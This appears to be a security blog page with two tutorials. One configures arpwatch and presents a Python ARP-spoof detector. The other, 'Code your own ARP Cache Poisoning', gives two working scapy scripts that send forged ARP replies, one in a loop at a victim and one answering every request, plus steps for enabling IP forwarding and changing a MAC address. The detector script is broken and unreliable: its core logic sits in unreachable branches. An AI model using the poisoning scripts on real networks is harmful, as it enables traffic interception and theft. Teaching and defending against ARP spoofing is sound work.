-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label arp cache poisoning. Show all posts
Showing posts with label arp cache poisoning. Show all posts
  • Defend ARP poisoning attacks with code your own arpwatcher

     

    Defend ARP poisoning attacks with code your own arpwatcher

     


    My dear Linux lovers, how are you all remember us, you were reading about cache poisoning, if you don't remember then it doesn't matter. But do not take tension, after this this blog will not let you forget, yet you bookmark our website, it is your benefit, so now come back to your on our topic.

    So, first of all lets know about ARP cache poisoning, The functionality of the protocol ARP (Address Resolution Protocol) was described in our another Post (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html) . A computer that wants to send an IP packet to another host must beforehand request the mac address of the destination by using the ARP protocol. This question gets broadcasted to all members of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker may send its victim every few seconds such an ARP reply packet but with its own MAC address as response and thus redirect the connection to itself.
     

    For More info about ARP cache poisoning attack via practical too - CLICK HERE

     

     



    Brought to you by Hacking Truth


     

    To defend ARP poisoning attacks one could on one side use static ARP entries, but those could get overwritten by received ARP responses depending on the ARP handling code of the operating system on the other side one could use a tool such as ARP watcher).  

    ARP watcher keeps an eye on the ARP traffic and reports suspicious behavior but will not prevent it. Nowadays most modern Intrusion Detection Systems can detect ARP cache poisoning attacks. You should check the
    functionality of your IDS by using the above scripts to see how it behaves.


    So, There are two methods when we talk about arp watching, the first one is code your own arp watcher and the second thing is used inbuilt tool. Choice is yours but both are same functionality and purpose.

    First we choose a inbuilt tool then we work on code your own arpwatching.


    Arpwatch


    Arpwatch is an opensouce computer software program that helps you to monitor Ethernet traffic activity (like changing IP and MAC Addresses) on your network and maintains a database of ethernet/wlan0/Ip address pairings. It produces a log of noticed pairing of IP and mac addresses information along with a timestamps. This tool is specially useful for Network administrators to keep a watch on ARP activity to detect ARP spoofing or unexpected IP/MAC addresses modifications.


    Let's Install


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
    └─$ sudo apt-get install arpwatch               
    [sudo] password for hackerboy: 
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following NEW packages will be installed:
      arpwatch
    0 upgraded, 1 newly installed, 0 to remove and 3 not upgraded.
    Need to get 49.0 kB of archives.
    After this operation, 161 kB of additional disk space will be used.
    Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 arpwatch amd64 2.1a15-8 [49.0 kB]
    Fetched 49.0 kB in 16s (3,125 B/s)  
    Selecting previously unselected package arpwatch.
    (Reading database ... 407952 files and directories currently installed.)
    Preparing to unpack .../arpwatch_2.1a15-8_amd64.deb ...
    Unpacking arpwatch (2.1a15-8) ...
    Setting up arpwatch (2.1a15-8) ...
    update-rc.d: We have no instructions for the arpwatch init script.
    update-rc.d: It looks like a network service, we disable it.
    arpwatch.service is a disabled or a static unit, not starting it.
    Processing triggers for man-db (2.9.4-2) ...
    Processing triggers for kali-menu (2021.4.2) ...
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr/arpcache]
    └─$ 
    



    Arpwatch configuration description


    Arpwatch on systmed based linux systems does not support a configuration file, but the systemd unit files shipped with Debian allow to launch arpwatch with different configurations on each interface.

    In order to do that, create a file called IFNAME.iface which contains variable assignments in sh syntax (comments are allowed). You can use the following variables to influence the invocation for that specific interface only:


    # ARGS: overwrite the ARGS from /etc/default/arpwatch
    # PCAP_FILTER: overwrite (or set) the pcap filter
    # IFACE_ARGS: additional options to be passed to arpwatch 

                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ cat /etc/default/arpwatch
    # Global options for arpwatch(8).
    
    # do not use the -i, -f or -u options here, they are added automatically
    # Debian: don't report bogons, don't use PROMISC.
    ARGS="-N -p"
    
    # if you want to add a pcap filter, uncomment and adjust the option below (you
    # will need spaces so adding -F to the ARGS above will cause problems). See -F
    # option in man 8 arpwatch for more information
    #PCAP_FILTER="not ether host (00:11:22:33:44:55 or 66:77:88:99:aa:bb)"
    
    # Debian: run as `arpwatch' user.  Empty this to run as root.
    RUNAS="arpwatch"
    
    # when using systemd you have to enable arpwatch explicitly for each interface
    # you want to run it on by running:
    # systemctl enable arpwatch@IFACE
    # systemctl start arpwatch@IFACE
    
    # For the LSB init script, enter a list of interfaces into the list below;
    # arpwatch will be started to listen on these interfaces.
    # Note: This is ignored when using systemd!
    # INTERFACES="eth0 eth1"
    INTERFACES=""
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    
    



    I have multiple ethernet interfaces on my debian server and I need run arpwatch on wlan0 interface:

          


                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ ifconfig                                                                                                                                                                          130 ⨯
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 688  bytes 61882 (60.4 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 688  bytes 61882 (60.4 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.249.25  netmask 255.255.255.0  broadcast 192.168.249.255
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            inet6 2409:4064:200b:220c:7ad5:600b:2ea3:7963  prefixlen 64  scopeid 0x0<global>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 53817  bytes 30589399 (29.1 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 62412  bytes 47543548 (45.3 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    
    


    In addition, on the enp5s0 interfaces I need to monitor changes in mac addresses not only for the 192.168.12.0/24 local network, but also for networks 192.168.122.0/24, 192.168.80/24 and 192.168.125.0/24. Changes in mac addresses I need log to file and also mail to email arpwatch@mydomain.com.


    Arpwatch configuration


    Go to /etc/arpwatch directory and create file wlan0.iface (IFNAME.iface) with this content:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo nano wlan0.iface  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ cat wlan0.iface           
    INTERFACES="wlan0"
    ARGS="-N -p"
    IFACE_ARGS="-m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24"
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    


    Here is man page for arpwatch: https://manpages.debian.org/unstable/arpwatch/arpwatch.8.en.html


    # The -m option is used to specify the e-mail address to which reports will be sent. By default, reports are sent to root on the local machine.

    # The -n flag specifies additional local networks. This can be useful to avoid bogon warnings when there is more than one network running on the same wire. If the optional width/mask is not specified, the default netmask for the network's class is used.

    # The -N flag disables reporting any bogons.

    # The -p flag disables promiscuous operation. ARP broadcasts get through hubs without having the interface in promiscuous mode, while saving considerable resources that would be wasted on processing gigabytes of non-broadcast traffic. Setting promiscuous mode does not mean getting 100% traffic that would concern arpwatch.


    Arpwatch and systemd


    Now you can start your arpwatch on wlan0 interface with systemctl start command:

     

      
      
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl daemon-reload
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl start arpwatch@wlan0 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
      

     

    You can check arpwatch daemon

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ sudo systemctl status arpwatch@wlan0                                                                                                                                                2 ⚙
    ● arpwatch@wlan0.service - arpwatch service on interface wlan0
         Loaded: loaded (/lib/systemd/system/arpwatch@.service; enabled; vendor preset: disabled)
         Active: active (running) since Tue 2022-01-25 18:10:08 IST; 28min ago
           Docs: man:arpwatch(8)
       Main PID: 26295 (arpwatch)
          Tasks: 1 (limit: 4366)
         Memory: 3.1M
            CPU: 745ms
         CGroup: /system.slice/system-arpwatch.slice/arpwatch@wlan0.service
                 └─26295 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 212.158.133.0/24 -F ""
    
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Stopped arpwatch service on interface wlan0.
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: arpwatch@wlan0.service: Consumed 2.360s CPU time.
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Starting arpwatch service on interface wlan0...
    Jan 25 18:10:08 KumarAtulJaiswal systemd[1]: Started arpwatch service on interface wlan0.
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: Running as uid=140 gid=149
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch[26295]: listening on wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: new station 192.168.249.45 08:00:27:67:67:30 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch[26295]: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$    
    
    

     

    new activity – This ethernet/ip address pair has been used for the first time six months or more.

    new station – The ethernet address has not been seen before.

    flip flop – The ethernet address has changed from the most recently seen address to the second most recently seen address. If either the old or new ethernet address is a DECnet address and it is less than 24 hours, the email version of the report is suppressed.

    changed ethernet address – The host switched to a new ethernet address.

     

     

     

    check that arpwatch run


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ ps aux|grep arp
    hackerb+    4312  0.1  0.4 545140 18244 ?        Sl   08:38   0:03 leafpad /home/hackerboy/Desktop/Penetration-tester-jr/arpcache/arpwatch/arpwatch-content.txt
    root        6365  0.0  0.0  11140  3212 pts/1    S+   08:46   0:00 sudo python3 arpcache.py 192.168.122.45 192.168.122.30
    root        6376  0.1  2.0 129852 76892 pts/1    S+   08:46   0:03 python3 arpcache.py 192.168.122.45 192.168.122.30
    arpwatch   14690  0.0  0.1  13680  6700 ?        S    09:15   0:00 /usr/sbin/arpwatch -u arpwatch -i wlan0 -f wlan0.dat -N -p -m arpwatch@mydomain.com -n 192.168.122.0/24 -n 192.168.80/24 -n 192.168.125.0/24 -F
    hackerb+   19812  0.0  0.0   6316  2260 pts/3    S+   09:35   0:00 grep --color=auto arp
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ 
    
    
    


    arpwatch after reboot


    You have to enable arpwatch@wlan0 service unit to start after system reboot:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl daemon-reload                                                                                                                                                        1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl enable arpwatch@wlan0                                                                                                                                                1 ⚙
    Created symlink /etc/systemd/system/multi-user.target.wants/arpwatch@wlan0.service → /lib/systemd/system/arpwatch@.service.
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$      
    
    


     

    Create /var/log/arpwatch directory and file arpwatch.log in this directory:

     

                                                                                                                                                                                     
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo mkdir /var/log/arpwatch                                                                                                                                                    1 ⨯ 1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo touch /var/log/arpwatch/arpwatch.log                                                                                                                                           1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo chmod 666 /var/log/arpwatch/arpwatch.log                                                                                                                                       1 ⚙
    

     

     

    And restart rsyslog daemon:

     

     

                                                                                                                                                                                            
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$ sudo systemctl restart rsyslog                                                                                                                                                127 ⨯ 1 ⚙
                                                                                                                                                                                                
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/etc/arpwatch]
    └─$           
    
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
    └─$ sudo systemctl status rsyslog                                                                                                                                                       1 ⚙
    ● rsyslog.service - System Logging Service
         Loaded: loaded (/lib/systemd/system/rsyslog.service; enabled; vendor preset: enabled)
         Active: active (running) since Mon 2022-01-24 09:51:27 IST; 4min 30s ago
    TriggeredBy: ● syslog.socket
           Docs: man:rsyslogd(8)
                 man:rsyslog.conf(5)
                 https://www.rsyslog.com/doc/
       Main PID: 23919 (rsyslogd)
          Tasks: 4 (limit: 4366)
         Memory: 1.6M
            CPU: 173ms
         CGroup: /system.slice/rsyslog.service
                 └─23919 /usr/sbin/rsyslogd -n -iNONE
    
    Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Starting System Logging Service...
    Jan 24 09:51:27 KumarAtulJaiswal systemd[1]: Started System Logging Service.
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: warning: ~ action is deprecated, consider using the 'stop' statement instead [v8.2110.0 try https://www.rsyslog.com/e/2307 ]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: imuxsock: Acquired UNIX socket '/run/systemd/journal/syslog' (fd 3) from systemd.  [v8.2110.0]
    Jan 24 09:51:27 KumarAtulJaiswal rsyslogd[23919]: [origin software="rsyslogd" swVersion="8.2110.0" x-pid="23919" x-info="https://www.rsyslog.com"] start
    ┌──(hackerboy㉿KumarAtulJaiswal)-[/var/log/arpwatch]
    └─$           
    
    


    And now you can see messges from working arpwatch daemon:

     

     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$                                                                                                                                                                               130 ⨯ 2 ⚙
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ cat /var/log/arpwatch/arpwatch.log   
                                                                                                                                             
    Jan 25 18:10:07 KumarAtulJaiswal arpwatch: exiting
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch: Running as uid=140 gid=149
    Jan 25 18:10:08 KumarAtulJaiswal arpwatch: listening on wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.79 e6:e4:e4:95:1e:27 wlan0
    Jan 25 18:10:26 KumarAtulJaiswal arpwatch: new station 192.168.249.25 fc:01:7c:29:00:77 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch: new station 192.168.249.45 08:00:27:67:67:30 wlan0
    Jan 25 18:34:18 KumarAtulJaiswal arpwatch: changed ethernet address 192.168.249.45 fc:01:7c:29:00:77 (08:00:27:67:67:30) wlan0
    
    

     

    arpwatch mac addresses files 

    Default directory for arpwatch mac addresses databes is /var/lib/arpwatch. File is in IFNAME.dat format. You can print databese content:


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$ cat /var/lib/arpwatch/wlan0.dat                                                                                                                                                 1 ⨯ 2 ⚙
    fc:01:7c:29:00:77       192.168.122.30  1643114422              wlan0
    fc:01:7c:29:00:77       192.168.122.25  1643045197              wlan0
    e6:e4:e4:95:1e:27       192.168.122.158 1643045197              wlan0
    e6:e4:e4:95:1e:27       192.168.249.79  1643119787              wlan0
    fc:01:7c:29:00:77       192.168.249.25  1643119770              wlan0
    fc:01:7c:29:00:77       192.168.249.45  1643119787              wlan0
    08:00:27:67:67:30       192.168.249.45  1643119391              wlan0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
    └─$      
    

     

     

    NOTE- When you run arpwatch daemon for first time, databese file is empty. You have to restart arpwatch daemon first to see any content. 

     

     

    Arp-watcher 

    Now this time we code own arp-watcher.

     

     

    #!/usr/bin/python
    from scapy.all import sniff, ARP
    from signal import signal, SIGINT
    import sys
    arp_watcher_db_file = "/var/cache/arp-watcher.db"
    ip_mac = {}
    # Save ARP table on shutdown
    
    
    def sig_int_handler(signum, frame):
        print "Got SIGINT. Saving ARP database..."
        try:
            f = open(arp_watcher_db_file, "w")
            for (ip, mac) in ip_mac.items():
                f.write(ip + " " + mac + "\n")
                f.close()
                print "Done."
        except IOError:
            print "Cannot write file " + arp_watcher_db_file
            sys.exit(1)
    
    
    def watch_arp(pkt):
        # got is-at pkt (ARP response)
        if pkt[ARP].op == 2:
            print pkt[ARP].hwsrc + " " + pkt[ARP].psrc
            # Device is new. Remember it.
            if ip_mac.get(pkt[ARP].psrc) == None:
                print "Found new device " + pkt[ARP].hwsrc + " " + pkt[ARP].psrc
                ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
                # Device is known but has a different IP
            elif ip_mac.get(pkt[ARP].psrc) and ip_mac[pkt[ARP].psrc] != pkt[ARP].hwsrc:
                print pkt[ARP].hwsrc + " has got new ip " + pkt[ARP].psrc + " (old " + ip_mac[pkt[ARP].psrc] + ")"
                ip_mac[pkt[ARP].psrc] = pkt[ARP].hwsrc
                signal(SIGINT, sig_int_handler)
    
    
    if len(sys.argv) < 2:
        print sys.argv[0] + " <iface>"
        sys.exit(0)
        try:
            fh = open(arp_watcher_db_file, "r")
        except IOError:
            print "Cannot read file " + arp_watcher_db_file
            sys.exit(1)
            for line in fh:
                line.chomp()
                (ip, mac) = line.split(" ")
                ip_mac[ip] = mac
                sniff(prn=watch_arp,
                      filter="arp",
                      iface=sys.argv[1],
                      store=0)
    
    

     

     

    python arpwatch.py iface

    python arpwatch.py wlan0

     

    At the start we define a signal handler in sig_int_handler() that gets called if the user interrupts the program. This function will save all known IP to MAC resolutions in the ip_mac dictionary to a file. Afterwards we read those ARP db file to initialize the program with all currently known resolutions or exit if the file cannot be read. Than we loop line by line through the files content and split each line into IP and MAC to save them in the ip_mac dictionary. Now we call the already known function sniff() that will invoke the callback function
    watch_arp for every received ARP packet.


    The function watch_arp implements the real logic of the program. When the sniffed packet is a is-at packet and therefore an ARP response than we first check if the IP exists in the ip_mac dictionary. If we didn’t find an entry the device is new and shows a message to the screen, otherwise we compare the MAC address with the MAC in our dictionary. If it differs the response is probably forged and we print a message to the screen. In both cases the dictionary gets updated with the new information.

     

     


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.


  • Code your own ARP Cache Poisoning


    Code your own ARP Cache Poisoning



    ARP-Cache-Poisoning


    The functionality of the protocol ARP (Address Resolution Protocol) was described in our another Post (https://www.kumaratuljaiswal.in/2021/09/master-local-area-network-lan.html) . A computer that wants to send an IP packet to another host must beforehand request the mac address of the destination by using the ARP protocol. This question gets broadcasted to all members of the network. In a perfect world the only computer that answers is the desired destination. In a not so perfect world an attacker may send its victim every few seconds such an ARP reply packet but with its own MAC address as response and thus redirect the connection to itself.


    This works because most operating systems accept response packets to questions they never asked!
     

    Lets write the code in python networking -

     

     

    #!/usr/bin/python
    
    import sys
    import time
    from scapy.all import sendp, ARP, Ether
    
    if len(sys.argv) < 3:
        print(sys.argv[0] + ": <target> <spoof_ip>")  #victim ip and Fake IP, sudo python3 arpcache.py 192.168.122.45 192.168.122.30 
        sys.exit(1)
    
    iface = "wlan0"
    target_ip = sys.argv[1]
    fake_ip = sys.argv[2]
    
    widelan = Ether()              #before widelan/ether (www.kumaratuljaiswal.in)
    arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
    
    packet = widelan / arp
    
    while True:
        sendp(packet, iface=iface)
        time.sleep(10)
        
    
    
    



    Code your own ARP Cache Poisoning




    With the help of Scapy we construct a packet called packet consisting of an Ethernet() and an ARP() header. In the ARP header we set the IP address of the victim (target_ip) and the IP which we would like to hijack all connections (fake_ip). As last parameter we define the OP-Code is-at, that declares the packet as an ARP response. Afterwards the function sendp() sends the packet in an endless loop waiting 10 s between each delivery. Its important to note that you have to call the function sendp() and not the function send(), because the packet should be sent on layer 2. The function send() sends packets on layer 3.

     

     

    Code your own ARP Cache Poisoning

     

     

     



    Additional Detail- Let's read


    For short refreshing:

    Ethernet is on Layer 2, IP (Internet Protocol) on Layer 3, TCP (Transport Control Protocol) or UDP on Layer 4–6 and services like HTTP, SMTP,
    FTP on Layer 7.



    NOTE - One last thing to remember is to enable IP forwarding otherwise your host would block the connection of the victim.




    IP Forwarding


    Why we need to use IP Forwarding in scapy (arpcache). Dont worry if you don't know let see If the Linux server is acting as a firewall, router, or NAT device, it will need to be capable of forwarding packets that are meant for other destinations (other than itself).

    Conversely, IP forwarding should usually be turned off if you’re not using one of the aforementioned configurations. You typically don’t want your system wasting bandwidth or resources to forward packets elsewhere, unless it’s been designed to do that job.



    Check current IP forwarding status


    Most systems will be able to use the sysctl command, which can apply kernel variables. Therefore, you can use the following sysctl command to check whether IP forwarding is enabled or disabled.

    # sysctl net.ipv4.ip_forward
    net.ipv4.ip_forward = 0

    In the example above, the net.ipv4.ip_forward kernel setting is 0. That means it’s off. If it were set to 1, that would mean it’s enabled.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ sysctl net.ipv4.ip_forward       
    net.ipv4.ip_forward = 0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    
    



    You can also check via this command cat /proc/sys/net/ipv4/ip_forward on file system enable or not!.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ cat /proc/sys/net/ipv4/ip_forward
    0
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    
    
    




    Enable or disable IP forwarding


    You can use the following sysctl command to enable or disable Linux IP forwarding on your system.

    # sysctl -w net.ipv4.ip_forward=0
    OR
    # sysctl -w net.ipv4.ip_forward=1




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ sudo sysctl net.ipv4.ip_forward=1
    net.ipv4.ip_forward = 1
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    
    
    
    
    

    Again we check ip forwarding setting whether it is enabled or not!!!



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ sysctl net.ipv4.ip_forward       
    net.ipv4.ip_forward = 1
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Downloads]
    └─$ 
     


     

     

    Code your own ARP Cache Poisoning

     

     

     

    Don’t forget to check the settings of your packet filter like IPtables, pf or ipfw or just disable it, but now enough about the boring theory lets jump into some practical Python code!

    If you only manipulate the ARP cache of the client with the fake_ip you only get the packets of the client, but the responses of the server will stay invisible.




    Code your own ARP Cache Poisoning



    Code your own ARP Cache Poisoning






    To enforce a bidirectional connection through the computer of the attacker like in above the attacker has to forge both the client and the server with his own MAC for the relevant destination. Our first code is a bit graceless and sends a lot of ARP packets. It doesn’t only
    generate more traffic as needed it’s also conspicuous. Stealthy attackers would use another tactic. A computer that wants to get knowledge about an IP address asks with an ARP
    request.




    Additional Details-


    What is Stealth ?


    Stealth scan or Half-open scan is one of the scanning methods in Nmap in which the intruder uses to bypass the firewall and authentication mechanisms. Also, by using this method, they make the scan operation as normal network traffic and thus the scan is hidden.



    We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request. In a switched environment this will result in every connection flowing over the computer of the attacker, because in every ARP cache there will be the attackers MAC for every IP address. This solution is more elegant and not as noisy as the one before, but still quite easy to detected for a trained admin. The spoofed response packet gets sent in parallel to the response of the real host as illustrated in Fig a.png . The computer whose packet receives first at the victims network card wins.



    Code your own ARP Cache Poisoning



    MAC Address change


    Every network card in an Ethernet network has a MAC address that’s world-wide unique and are used to address devices on the net. The MAC address consists of six two digit hexadecimal numbers, which are separated by colons (e.g. aa:bb:cc:11:22:33).

    Its a common misbelief that a computer in a local TCP/IP network is reached over its IP address; in reality the MAC address is used for this purpose. Another common misunderstanding is that the MAC address cannot be spoofed. The operating system is responsible to write the MAC into the Ethernet header and systems like GNU/Linux or *BSD have possibilities in their base system to change the MAC with one command.


    Also read - https://www.kumaratuljaiswal.in/2020/04/how-to-change-mac-address-with-mac.html



    Changing MAC address Command -

    Before/n/After


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ ifconfig
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ sudo ifconfig eth0 hw ether c0:de:de:ad:be:e
    
    [sudo] password for hackerboy: 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ ifconfig                                    
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether c0:de:de:ad:be:0e  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kumaratuljaiswal.in]
    └─$ 
    
    



    We will write a program that waits for ARP requests and sends a spoofed ARP response for every received request.

     


    import sys
    import time
    from scapy.all import sniff, sendp, ARP, Ether
    
    if len(sys.argv) > 2:
        print(sys.argv[0] + " <iface>")
        sys.exit(0)
    
    
    def arp_poison_callback (packet):
        #Got ARP request
        if packet[ARP].op == 1:
            answer = Ether(dst=packet[ARP].hwsrc) / ARP()
            answer[ARP].op = "is-at"
            answer[ARP].hwdst = packet[ARP].hwsrc
            answer[ARP].psrc = packet[ARP].pdst
            answer[ARP].pdst = packet[ARP].psrc
    
            print("Fooling " + packet[ARP].psrc + " that " + packet[ARP].pdst + " is me")
            sendp(answer, iface=sys.argv[1])
    
    
    sniff(prn=arp_poison_callback,
          filter="arp",
          iface=sys.argv[1],
          store=0)
    
    
    
    
    



